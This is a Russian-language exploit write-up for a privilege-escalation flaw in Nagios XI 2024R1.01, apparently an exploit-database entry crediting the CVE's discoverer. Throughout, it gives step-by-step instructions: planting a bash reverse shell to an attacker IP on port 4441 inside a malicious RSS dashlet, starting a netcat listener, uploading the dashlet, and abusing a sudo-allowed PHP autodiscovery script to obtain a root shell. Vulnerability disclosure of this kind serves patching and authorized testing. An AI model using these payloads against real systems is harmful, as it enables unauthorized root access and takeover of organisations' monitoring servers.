
Эксплойт для повышения привилегий в Nagios XI 2024R1.01, позволяющий получить полный root-доступ от пользователей NAGIOS или APACHE через внедрение вредоносного RSS-виджета и выполнение команд sudo.
CVE обнаружен: K. Wahab (Neo`X)
RSS Dashlet используется в данном примере.
Добавьте в файл dashlet .inc.php по пути "/usr/local/nagiosxi/html/includes/dashlets/" следующее содержимое:
exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
Запустите сервер прослушивания Netcat на машине атакующего:
nc -nlvp 4441
Выполните следующую команду для повышения привилегий и получения подключения как root:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
Перейдите на страницу управления "dashlets" и загрузите Dashlet:
http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
Измените *.inc.php:
exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");

Запустите сервер прослушивания Netcat на машине атакующего:
nc -nlvp 4441
Загрузите вредоносный дашлет на страницу управления дашлетами и ожидайте подключения от имени пользователя APACHE.
Выполните следующую команду для повышения привилегий и получения подключения как root:
sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
(Примечание: после выполнения команды вы получите подключение как APACHE, используйте CTRL+C для выхода и перезапустите слушатель несколько раз)
